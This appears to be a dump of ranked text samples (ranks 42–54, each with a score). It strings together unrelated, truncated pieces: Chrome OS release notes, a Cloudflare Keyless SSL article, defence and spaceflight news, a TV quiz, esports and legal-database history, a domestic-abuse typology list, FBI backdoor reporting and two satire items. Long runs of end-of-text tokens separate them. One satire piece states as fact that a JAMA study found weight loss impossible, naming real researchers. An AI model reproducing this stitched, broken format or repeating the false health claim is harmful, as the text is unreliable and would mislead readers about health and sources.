f_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 42; Score = 9568256.0 +<|begin_of_text|>The Stable channel has been updated to 28.0.1500.68 for all Chrome OS devices (Platform version: 4100.68.0 for all devices except Cr-48, which was updated to 4100.78.0). This build contains a number of feature enhancements, bug fixes and security improvements. Machines will be receiving updates over the next several days. + +Release Highlights: + +Numerous crash fixes and performance improvements. + +Speed improvements for the Files app, along with support for files that are Shared with me and Recent on Google Drive. + +Monitor Rotation and Scaling - you can scale your UI smaller and rotate the screen on all Chromebooks. + +Notification pop-up message appears when screenshots are taken. Clicking on the notification will bring you right to the screenshot. + +Replaced the Japanese IME with a NaCl extension version downloads a better language model upon actual usage. + +Added transliteration IMEs for Indic languages from Google Input Tools. + +Touch link highlighting on Chromebook Pixel - we now provide feedback on which link you click or button you press. + +Updated Chrome Office Viewer (Beta) extension + +Pepper Flash updated to 11.8.800.94 + +Known issues: + +On Acer C7 Chromebooks, docked mode has been disabled when connecting to an external monitor. + +I f you find new issues, please let us know by visiting our help site or filing a bug. Interested in switching channels? Find out how. You can submit feedback using ‘Report an issue...’ in the Chrome menu (3 horizontal bars in the upper right corner of the browser). + +Danielle Drew + +Google Chrome<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 43; Score = 9568256.0 +<|begin_of_text|>WASHINGTON—According to a groundbreaking new study published Monday in the Journal Of The American Medical Association, it is impossible to lose weight, no one has ever lost a single pound of fat through diet or exercise, and those attempting to do so are advised to abandon their weight loss goals immediately. + +The study, conducted by scientists at The National Weight Control Registry, determined conclusively that shedding excess weight has never occurred, changing your appearance is impossible, and that it actually feels “pretty nice” to just give up and realize that you’re powerless to alter your body mass index in any way, shape, or form. + +Advertisement + +“Our findings indicate that if you’re trying to lose weight, you will fail—and that’s because you can’t, no one has, and you need to stop trying because it will never happen,” said Dr. Rena Wing, lead author of the report. “You could work out every day and eat nothing, and you still wouldn’t lose an ounce. And the sooner you throw up your hands and make peace with that fact, the better off you’ll be.” + +“Our data demonstrates that you’re doomed to look the way you look,” Wing added. “You are stuck in your body and it’s never going to look any better than it does right now. In fact, it will only get worse.” + +According to the study, running on a treadmill every morning at 6 a.m. will not help anyone lose weight, and neither will cutting carbohydrates from one’s diet, eating smaller portions throughout the day, doing yoga, or hiring a personal trainer. In addition, the study went on to state that everyone who tried the previous methods have only ended up feeling disappointed and in some cases heartbroken, especially after individuals step onto a scale and realize that, after two weeks of healthy eating and nonstop exercise, they’ve actually gained two or more pounds. + +Advertisement + +The report added that skinny people stay skinny, overweight people remain overweight, that’s how it has always been, that’s how it will always be, and every study, book, or news article you’ve ever read that has told you otherwise has been totally and completely wrong. + +“Going to the gym is a waste of time if you are doing it to lose weight,” said University of California physiologist Dr. Andrew Novak, adding that time working out would be better spent reading, spending time with your family, sleeping, watching television, or eating. “Now, if you are exercising to prevent heart disease or cancer, well, new evidence has come to light that +================================================================================ +Rank = 44; Score = 9437184.0 +<|begin_of_text|>Content delivery network and Web security company Cloudflare has made a name for itself by fending off denial-of-service attacks against its customers large and small. Today, it's launching a new service aimed at winning over the most paranoid of corporate customers. The service is a first step toward doing for network security what Amazon Web Services and other public cloud services have done for application services—replacing on-premises hardware with virtualized services spread across the Internet. + +Called Keyless SSL, the new service allows organizations to use Cloudflare’s network of 28 data centers around the world to defend against distributed denial of service attacks on their websites without having to turn over private encryption keys. Keyless SSL breaks the encryption “handshake” at the beginning of a Transport Layer Security (TLS) Web session, passing part of the data back to the organization’s data center for encryption. It then negotiates the session with the returned data and acts as a gateway for authenticated sessions—while still being able to screen out malicious traffic such as denial of service attacks. + +In an interview with Ars, Cloudflare CEO Matthew Prince said that the technology behind Keyless SSL could help security-minded organizations embrace other cloud services while keeping a tighter rein on them. “If you decide you’re going to use cloud services today, how you set policy across all of these is impossible," he said. "Now that we can do this, fast forward a year, and we can do things like data loss prevention, intrusion detection… all these things are just bytes in the stream, and we’re already looking at them.” + +All of that puts Cloudflare on a path to, as Prince put it, do to Cisco and other network hardware suppliers what AWS and other cloud services have done to Hewlett-Packard and Dell-type server vendors. The technology could also help extend Internet services to areas of the world that lack the sort of trustworthy data centers that Cloudflare and other cloud providers operate from, as it keeps their most precious secrets locked away back at the core of their networks. + +Changing the locks + +The development of Keyless SSL began about two years ago, on the heels of a series of massive denial of service attacks against major financial institutions alleged to have been launched from Iran. “We got a series of fairly frantic calls from those banks saying they needed help with this problem,” Prince said. “We met with JP Morgan Chase, Goldman Sachs… pretty much everyone in that community. They described to us a challenge that put them between a rock and a hard place. They had spent billions on hardware +================================================================================ +Rank = 45; Score = 9437184.0 +<|begin_of_text|>This article was originally published April 20, 2016, at 1:14 p.m. EST. It has been updated to include comments from Sen. John McCain. + +WASHINGTON — Pentagon acquisition chief Frank Kendall, in congressional testimony Wednesday, defended the controversial path to end the US reliance on Russian rocket engines for military space launch—and Senate appropriators signaled their continued support. + +That path, for now, involves using more of the engines while the industrial base ramps up to offer competing engines. DoD could replace the RD-180 engines by 2021 at the soonest, but the politicization of the issue is slowing down needed Congressional action, Kendall, the undersecretary of defense for acquisition, technology and logistics, said at a Senate Appropriations Defense Subcommittee hearing Wednesday. + +"It's a complicated issue, but the [Defense] Department's goals have never changed, to develop two engines, so if one of them has a failure, and we have a big gap in capability, we still have access to space," Kendall said. "We need competition to keep the expense down." + +Ultimately, DoD will seek public-private partnerships for reasonably priced launch services, versus buying a lone replacement engine and subsidizing a single company, Kendall said. Replacing the Atlas V with a combination of ULA's Delta IV heavy launch system would cost, Kendall said, as much as $50 million per launch. + +"It would be over $1 billion out of our defense budget to get us off RD-180s, and I don't think that's a good tradeoff," Kendall said. + +The US Air Force contracts for launch services with United Launch Alliance, a joint venture of Boeing and Lockheed Martin, which uses the RD-180 rocket engine to power its Atlas V launch vehicles. SpaceX is ULA's main competition for Pentagon business, as the company's Falcon 9 rocket won certification last year to compete for military space launches. + +× Fear of missing out? Fear no longer. Be the first to hear about breaking news, as it happens. You'll get alerts delivered directly to your inbox each time something noteworthy happens in the Military community. Thanks for signing up. By giving us your email, you are opting in to our Newsletter: Sign up for our Early Bird Brief + +For their support of DoD's plan, two key appropriators, the SAC-D's ranking member, Sen. Richard Durbin, D-Ill., and subpanel member Sen. Richard Shelby, R-Ala., have attracted the ire of the Senate's lead authorizer, Senate Armed +================================================================================ +Rank = 46; Score = 9437184.0 +<|begin_of_text|>Whitson Becomes World's Oldest Female Spacewalker, as EVA-38 Replaces Aging Space Station Batteries + +Two U.S. astronauts, including the oldest woman ever to participate in an Extravehicular Activity (EVA), triumphantly concluded a six-hour and 32-minute spacewalk outside the International Space Station (ISS) earlier today. Expedition 50 Commander Shane Kimbrough and Flight Engineer Peggy Whitson breezed through the task of installing three new adapter plates and hooked up electrical connectors for a trio of new lithium-ion (Li-Ion) batteries on the starboard-side S-4 segment of the station’s Integrated Truss Structure (ITS). Their work heralds the start of a two-year campaign of EVAs and robotics, which will see 48 aging nickel-hydrogen batteries on the port and starboard trusses replaced with 24 smaller, but higher-performing, lithium-ion ones. Working around an hour ahead of the timeline, Kimbrough and Whitson were also able to complete several “get-ahead” tasks, including a photographic survey of the station’s Alpha Magnetic Spectrometer (AMS-2). + +Today’s spacewalk was designated “U.S. EVA-38” and represented the 38th spacewalk to be conducted out of the Quest airlock, with astronauts clad in U.S.-built Extravehicular Mobility Units (EMUs) and conducted in the absence of the space shuttle. Since U.S. EVA-1, way back in February 2002, these excursions have outfitted new hardware, removed and replaced faulty equipment, reconfigured coolant loops, tackled ammonia leaks, and laid cables in readiness for Commercial Crew operations and the arrival or relocation of pressurized modules. Last summer, Expedition 48 spacewalkers Jeff Williams and Kate Rubins performed EVAs 36 and 37 to install an International Docking Adapter (IDA-2) onto the Harmony node and retract the Trailing Thermal Control Radiator (TTCR) on the station’s port-side P-6 truss. + +These U.S. Orbital Segment (USOS)-based EVAs have been performed not only by NASA astronauts, but have also involved German, Russian, Japanese, Italian, and British nationals. They have seen a number of records secured, including Sunita Williams becoming the most experienced female spacewalker and holder of the greatest number of EVAs—seven—ever conducted by a woman. Yet during today’s EVA-38, one of Williams’ achievements was +================================================================================ +Rank = 47; Score = 9371648.0 +<|begin_of_text|>Question Answer Episode Marshall hits Lily with what after he proposes? Pilot Thing Ted pretends he is buying at the store? Purple Giraffe Barney's luggage contains? Sweet Taste of Liberty Name one of the things Ted fondly remembers about Natalie. Return of the Shirt Barney says that there are 24 similarities between women and what? Okay Awesome The Slutty Pumpkin's drink? Slutty Pumpkin Unusual creature in Ted and Marshall's apartment? Matchmaker Place Lily's apartment has been turned into? The Duel Sport Marshall's family has created? Belly Full of Turkey Name of the shot that Carl creates? The Pineapple Incident 'Celebrity' that joins the gang on New Years? The Limo First thing that Marshall and Lily agree about for the wedding? The Wedding Fake name Victoria uses? Drumroll, Please 'I want to know you, like _____ _____ _____.' Zip, Zip, Zip What Barney refers to Ted's embarrassing story as? Game Night Where is Marshall's dream internship? Cupcake The song Marshall and Lily sing? Life Among the Gorillas Who do Marshall, Lily, and Barney hang out with? Nothing Good Happens After 2 AM Cutout Ted and Marshall use on Sandy? Mary the Paralegal What Scooter wants to be? Best Prom Ever What Robin shows Ted to cheer him up? Milk What Ted does to stop Robin's camping trip? Come On The pet George Clinton buys Lily? Where Were We? What Ted orders to cure his hangover? The Scorpion and the Toad What Ted and his dad talk about if things get uncomfortable? Brunch Movie Ted is mad that Robin dislikes? Ted Mosby, Architect Concert Marshall and Brad go to? World's Greatest Couple Who plays the Cougar? Aldrin Justice Show the end of the episode reference? Swarley What Barney has to find to win the game? Atlantic City Name of Robin's hit single? Slap Bet What James does that reveals he's in a relationship? Single Stamina Word that Ted calls Lily? How Lily Stole Christmas Where the gang takes Robin's sister? First Time in New York Name of Ted's annoying ex-boss? Columns Who Barney bumps into on the street? Monday Night Football Where is Ted's interview? Lucky Penny Name of Barney's one-man show? Stuff Name of the song that the Fiero plays? Arrivederci, Fiero One of the names that Barney gives the truck in his Top Ten List Moving Day What Lily's grandmother gives her at the bridal shower? Bachelor Party Show Barney appears on? Showdown +================================================================================ +Rank = 48; Score = 9109504.0 +<|begin_of_text|>All week, The Ringer will be celebrating Good Bad Movies, those films that are so terrible they’re endlessly amusing and — dare we say it? — actually good. Please join us as we give the over-the-top action movies, low-budget romance thrillers, and peak ’80s cheese-fests the spotlight they deserve. + +If we were to view all of the Good Bad Movies as parts and pieces that exist parallel to one another, adjacent to one another, in the same plane as one another, and they could snap together to form a kind of Good Bad Movie Universe, then who would be the actor who lorded over all of it? That’s a big question and a hard question because there are so, so, so many Good Bad Movies. But actually it’s a small question and an easy question because the answer is very clear: + +Nicolas Cage has acted in more than 80 movies during his career. Mind you, not all of them are Good Bad Movies. That is not the argument here; the quality of his movies covers a wide, big, broad range. Some of them are Actually Good Movies, some of them are Good Bad Movies, some of them are Bad Movies, some of them are Bad Good Movies, some of them are Bad Bad Movies, and some of them fall in the cracks between those categories. So no, the argument is not that every Nicolas Cage movie is a Good Bad Movie. The argument is that, in total, Nicolas Cage is the King of the Good Bad Movie Universe. + +Question: How does one become the King of the Good Bad Movie Universe, or even qualify for the title? + +Answer: In a previous article, the requirements for a Good Bad Movie were laid out as such: + +Enjoyment of the movie must be derived from its badness. Its badness needs to be the thing that creates a sense of bewildered enjoyment. + +There must be a pervading sense that those who made the film thought what they were doing was great or at least good. Good Bad Movies have minimal self-awareness. Here are two examples that may help explain this sentiment: 1) MacGruber is not a Good Bad Movie, it’s a tribute to Good Bad Movies, and 2) Fast Five is not a Good Bad Movie, it is a movie that intentionally wades into ridiculousness (and then manufactures a reaction similar to the one a Good Bad Movie elicits naturally). + +The movie must have been something of a critical failure when it was released. Critics, god bless them, hold movies +================================================================================ +Rank = 49; Score = 8847360.0 +<|begin_of_text|>SETT TV Profile Joined January 2011 77 Posts Last Edited: 2013-07-26 17:53:09 #1 + +ASUS ROG releases the rules, map pool and the groups which start off the ASUS ROG Summer 2013 StarCraft II tournament in Helsinki August 1-3. + +It is less than a week until the first matches of ASUS ROG Summer 2013 go live. The players have now been placed in the groups for the first group stage which will be played on the first day of the tournament, Thursday 1st August 13:00--22:30 CEST. The 32 players are divided into groups of four, which will be played in dual tournament format with best-of-5 matches. The top two players of each group advance to the second group stage, which is played in a similar fashion on Friday 2nd August. + +It is less than a week until the first matches of ASUS ROG Summer 2013 go live. The players have now been placed in the groups for the first group stage which will be played on the first day of the tournament, Thursday 1st August 13:00--22:30 CEST. The 32 players are divided into groups of four, which will be played in dual tournament format with best-of-5 matches. The top two players of each group advance to the second group stage, which is played in a similar fashion on Friday 2nd August. Replacements + +It is very unfortunate, but there have been more cancellations this week as Evil Geniuses.Jaedong, + +Evil Geniuses.Suppy, Millenium.ForGG, and are unable to attend the event. + +However, despite the proximity of the event, we were able to get noteworthy replacements: Dignitas.TargA, + +NaVi.BabyKnight, prOperty.RunA, and will take the vacant spots. We are very grateful to these players and teams who heeded our call and made the arrangements in a short time so that the tournament could retain its high standards. + +It is very unfortunate, but there have been more cancellations this week as Alliance.NaNiwa and Fnatic.NightEnD are unable to attend the event.However, despite the proximity of the event, we were able to get noteworthy replacements: Fnatic.Naama and Bischu will take the vacant spots. We are very grateful to these players and teams who heeded our call and made the arrangements in a short time +================================================================================ +Rank = 50; Score = 8847360.0 +<|begin_of_text|>LexisNexis Group is a corporation providing computer-assisted legal research (CALR) as well as business research and risk management services.[2][3] During the 1970s, LexisNexis pioneered the electronic accessibility of legal and journalistic documents.[4] As of 2006, the company has the world's largest electronic database for legal and public-records related information.[5] + +History [ edit ] + +LexisNexis office in Markham, a suburb of Toronto, Ontario, Canada + +LexisNexis is currently owned by RELX Group (formerly known as Reed Elsevier).[6] + +The story of LexisNexis starts in western Pennsylvania in 1956, when attorney John Horty began to explore the use of CALR technology in support of his work on comparative hospital law at the University of Pittsburgh Health Law Center.[7] In 1965, Horty's pioneering work inspired the Ohio State Bar Association (OSBA) to develop its own separate CALR system, Ohio Bar Automated Research (OBAR).[8] In 1967, the OSBA signed a contract with Data Corporation, a local defense contractor, to build OBAR based on the OSBA's written specifications.[8] Data proceeded to implement OBAR on Data Central, an interactive full-text search system originally developed in 1964 as Recon Central to help U.S. Air Force intelligence analysts search text summaries of the contents of aerial and satellite reconnaissance photographs.[9] + +In 1968, paper manufacturer Mead Corporation purchased Data Corporation for $6 million to gain control of its inkjet printing technology.[10] Mead hired the Arthur D. Little firm to study the business possibilities for the Data Central technology.[10] Arthur D. Little dispatched a team of consultants to Ohio led by H. Donald Wilson.[11] Mead asked for a practicing lawyer on the team, so the team included Jerome Rubin, a Harvard-trained attorney with 20 years of experience.[12] The resulting study concluded that the nonlegal market was nonexistent, the legal market had potential, and OBAR needed to be rebuilt to profitably exploit that market.[12] At the time, OBAR searches often took up to five hours to complete if more than one user was online, and its original terminals (replaced with CRT text terminals in 1970) were noisy Teletypes with slow transmission rates of 10 characters per second.[13] OBAR also had quality control issues; Rubin later recalled that its data was “ +================================================================================ +Rank = 51; Score = 8847360.0 +<|begin_of_text|>Yes, Eric Shin­seki had to go, and he prob­ably knew it him­self once the hor­ror stor­ies sur­faced. As the re­tired four-star gen­er­al learned at West Point, the com­mand­er is ul­ti­mately re­spons­ible. While the Vet­er­ans Ad­min­is­tra­tion has been a ma­na­geri­al bleed­ing sore for years, the chaos and per­haps crimin­al­ity at sub­or­din­ate ech­el­ons of the VA on Shin­seki’s watch made his sur­viv­al im­possible. + +But let’s not for­get that Ric Shin­seki is not just a highly dec­or­ated com­mand­er and wounded war­ri­or, los­ing part of his foot in Vi­et­nam and claw­ing his way back onto act­ive duty against the wishes of Army brass. He’s a truth-tell­er of the first rank — and that dis­play of char­ac­ter so en­raged the George W. Bush de­fense team that he en­countered some of the shab­bi­est treat­ment an of­ficer and a gen­tle­man has ever en­countered dur­ing my 46 years serving in and hanging around the Pentagon. + +It didn’t help his case with the Bush­ies that Bill Clin­ton had ap­poin­ted him Army chief of staff. Moreover, De­fense Sec­ret­ary Don­ald Rums­feld, who didn’t en­joy be­ing chal­lenged, quickly took a dis­like to Shin­seki after sev­er­al policy and strategy dis­agree­ments. + +Rummy was so in­tent on pun­ish­ing Shin­seki out, in fact, that he dir­ec­ted one of his flack-shop aco­lytes to leak word of his re­place­ment to The New York Times — 15 months be­fore Shin­seki’s four-year term was up. + +This had the in­stant ef­fect of ren­der­ing Shin­seki a lame duck with­in the E-ring, the Pentagon’s power cor­ridor. It was cheesy, petty, shame­ful, +================================================================================ +Rank = 52; Score = 8781824.0 +<|begin_of_text|>TYPES OF ABUSE Domestic Violence comprises a wide range of types of abuse. Incidents are not generally a one-off event, but can be seen as forming part of a coercive pattern of controlling behaviour. This list includes some of the ways in which a person experiencing domestic violence might be abused: not all of these behaviours would necessarily fall within the criminal law. Slapping Insisting on having sex whenever he wants it Restricting her movements Making her put things back in an exact order Threats of physical violence Smacking Having sex with her when she doesn't want it Preventing her from keeping appointments Finding endless trivial tasks for her to do Threats of future physical violence Smacking in the face Refusing to have sex with her Timing her movements Making her continually redo tasks after finding fault with what she has done Threats of sexual violence Pushing Having affairs to humiliate her Accompanying her everywhere Making her polish the soles of his shoes Threats of future sexual violence Shoving Having sex with others in front of her Following her everywhere Enforcing a routine Threats with weapons or objects Pushing downstairs Denying her sexuality Making decisions for her Only letting her use the bathroom or toilet at certain times of day Threats to kill her Punching Expecting to have sex with her after having physically assaulted her Making her work long hours Preventing her from sleeping Threats to harm or kill her children Kicking Using objects during intercourse against her will Preventing her from working Making her sleep on the floor Threats to take her children away Hitting Forcing her to watch or engage in pornography Isolating her from her friends and family Preventing her from eating Threats to harm or kill another loved one Hitting her with objects Enforcing sado-masochistic activity Making her family and friends too scared to contact her Making her eat inedible food or disgusting things Threats to harm or kill pets Holding her against the wall Forcing her to perform sexual acts in front of her children Turning her family and friends against her Preventing her from getting or keeping her job Threats to self harm or commit suicide Holding her down Forcing her to perform sexual acts in front of other people Getting his family or friends to intimidate her Preventing her from studying Threats to have her deported Banging her head against the floor Forcing her to perform sexual acts with other people Isolating her from her community Destroying her work Threats to report her to the authorities Banging her head against the wall Forcing her to perform sexual acts with animals Telling her +================================================================================ +Rank = 53; Score = 8716288.0 +<|begin_of_text|>The FBI has been lobbying top internet companies like Yahoo and Google to support a proposal that would force them to provide backdoors for government surveillance, according to CNET. + +The Bureau has been quietly meeting with representatives of these companies, as well as Microsoft (which owns Hotmail and Skype), Facebook and others to argue for a legislative proposal, drafted by the FBI, that would require social-networking sites and VoIP, instant messaging and e-mail providers to alter their code to make their products wiretap-friendly. + +The FBI has previously complained to Congress about the so-called "Going Dark" problem – the difficulty of doing effective wiretap surveillance as more communications have moved from traditional telephone services to internet service companies. + +Under the Communications Assistance for Law Enforcement Act, or CALEA, passed in 1994, telecommunications providers are required to make their systems wiretap-friendly. The Federal Communications Commission extended CALEA in 2004 to apply to broadband providers like ISPs and colleges, but web companies are not covered by the law. + +CNET reports that in addition to this push from the FBI, the Federal Communications Commission may be looking at reinterpreting CALEA to demand that video and non-telephone-replacement VoIP products such as Skype and Xbox Live be modified to include backdoors that allow FBI surveillance. + +The news comes on the heels of another FBI plan that began kicking around in 2010 that would require backdoors in encrypted communication systems. That proposal, which would revisit the encryption wars of the 1990s, has failed to gather administration backing.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 54; Score = 8519680.0 +<|begin_of_text|>After a disastrous start to pre-season testing, there was more bad news for McLaren today as Fernando Alonso was spotted lurking around other teams’ garages asking if they ‘needed any help’. + +Spies within the McLaren camp says that with the MP4-31 in a frequent state of malfunction, the Spanish driver has divided his time between skulking around other teams’ areas asking for work and browsing the internet for a new deckchair. + +‘Fernando came into our garage yesterday,’ revealed a source from one front-running operation. ‘He hung around for a bit making small talk then, just as he was leaving, he asked if we needed any help with “you know, driving and stuff”.’ + +‘Alonso was hanging around our stuff for ages yesterday,’ said an engineer for another well-known team. ‘After a while he looked at our data and loudly said, “Nice times. I wonder if I could do better in this car? Wouldn’t it be funny to find out, perhaps here, or maybe in Melbourne” then he laughed nervously, stopped for a minute, grabbed a spanner off the bench and ran off.’ + +‘With his own car not working, I think he just wants to have a go in a Mercedes or a Ferrari or a Red Bull or a Williams or a Force India or a Renault or a Sauber or a Toro Rosso or a Haas or a Manor or a lawn tractor,’ said F1 journalist Maurice Ital. ‘Basically, anything that’s 